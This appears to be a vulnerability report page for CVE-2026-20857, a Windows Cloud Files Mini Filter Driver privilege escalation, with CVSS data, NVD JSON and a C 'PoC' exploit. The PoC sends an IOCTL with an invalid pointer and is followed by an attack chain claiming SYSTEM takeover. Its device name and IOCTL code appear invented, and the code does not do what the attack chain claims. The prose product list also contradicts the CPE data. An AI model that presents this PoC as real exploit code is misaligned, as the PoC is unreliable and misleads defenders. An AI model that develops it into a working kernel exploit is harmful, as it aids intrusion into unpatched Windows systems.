Security Vulnerability Report
CVE-2026-20857 CVSS 7.8 HIGH

Published: 2026-01-13 18:16:14
Last Modified: 2026-01-15 15:21:42

Description

Untrusted pointer dereference in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10 1809 and earlier
Windows 11 21H2 and earlier
Windows Server 2019 and earlier
Windows Server 2022 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-20857 PoC - Windows Cloud Files Mini Filter Driver Local Privilege Escalation
// This is a conceptual PoC demonstrating the attack vector
// Actual exploitation requires specific environment conditions
#include <windows.h>
#include <stdio.h>

// IOCTL code for Cloud Files Mini Filter Driver communication
#define FILE_DEVICE_CLOUD_FILES 0x00009000
#define IOCTL_CF_MINI_FILTER_OPERATION CTL_CODE(FILE_DEVICE_CLOUD_FILES, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef struct _CLOUD_FILES_REQUEST {
    ULONG OperationType;
    PVOID UntrustedPointer;  // Pointer that won't be validated
    ULONG PointerSize;
} CLOUD_FILES_REQUEST, *PCLOUD_FILES_REQUEST;

int main() {
    HANDLE hDevice;
    CLOUD_FILES_REQUEST Request;
    DWORD ReturnBytes;
    BOOL Success;

    printf("[*] CVE-2026-20857 PoC - Local Privilege Escalation\n");
    printf("[*] Target: Windows Cloud Files Mini Filter Driver\n");

    // Open handle to the Cloud Files Mini Filter Driver device
    // (ANSI variant, because the device path is a narrow string)
    hDevice = CreateFileA(
        "\\\\.\\CloudFilesMiniFilter",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device handle. Error: %lu\n", GetLastError());
        return 1;
    }

    printf("[+] Device handle opened successfully\n");

    // Prepare malicious request with untrusted pointer
    Request.OperationType = 0x01;                  // Specific operation that triggers vulnerability
    Request.UntrustedPointer = (PVOID)0xFFFFFFFF;  // Invalid kernel pointer
    Request.PointerSize = sizeof(PVOID);

    // Send IOCTL request to trigger untrusted pointer dereference
    Success = DeviceIoControl(
        hDevice,
        IOCTL_CF_MINI_FILTER_OPERATION,
        &Request,
        sizeof(Request),
        NULL,
        0,
        &ReturnBytes,
        NULL
    );

    if (!Success) {
        printf("[-] IOCTL request failed. Error: %lu\n", GetLastError());
        printf("[*] Note: This may indicate the vulnerability is patched or conditions not met\n");
    } else {
        printf("[+] IOCTL request completed - possible vulnerability trigger\n");
    }

    CloseHandle(hDevice);
    return 0;
}

/*
[*] Attack Chain:
1. Attacker obtains low-privilege access to Windows system
2. Attacker identifies Cloud Files Mini Filter Driver is loaded
3. Attacker crafts malicious IO request with invalid pointer
4. Driver dereferences untrusted pointer without validation
5. Attacker achieves arbitrary kernel memory write
6. Attacker escalates privileges to SYSTEM level
7. Attacker gains full control of the compromised system
*/

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20857", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:14.480", "lastModified": "2026-01-15T15:21:42.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Untrusted pointer dereference in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally."}, {"lang": "es", "value": "Desreferencia de puntero no confiable en el controlador de minifiltro de archivos en la nube de Windows permite a un atacante autorizado elevar privilegios localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-822"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "1895E186-5B2E-43CC-AF1F-B5C95419D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": 
"B7CB5184-1BA1-4D71-8AE3-CF4C6B63A469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2092", "matchCriteriaId": "BA5947E0-C44C-4517-A307-DA79752F30A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32230", "matchCriteriaId": "D44880ED-E8E9-49A8-BD56-503C63D40000"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20857", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}